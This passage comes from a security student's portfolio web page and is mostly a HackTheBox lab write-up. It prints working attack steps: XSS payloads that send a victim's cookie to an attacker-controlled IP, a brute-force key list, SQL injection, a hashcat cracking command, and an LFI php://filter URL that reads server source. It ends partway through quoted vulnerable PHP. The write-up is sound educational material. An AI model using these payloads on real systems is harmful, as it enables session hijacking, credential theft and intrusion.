          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
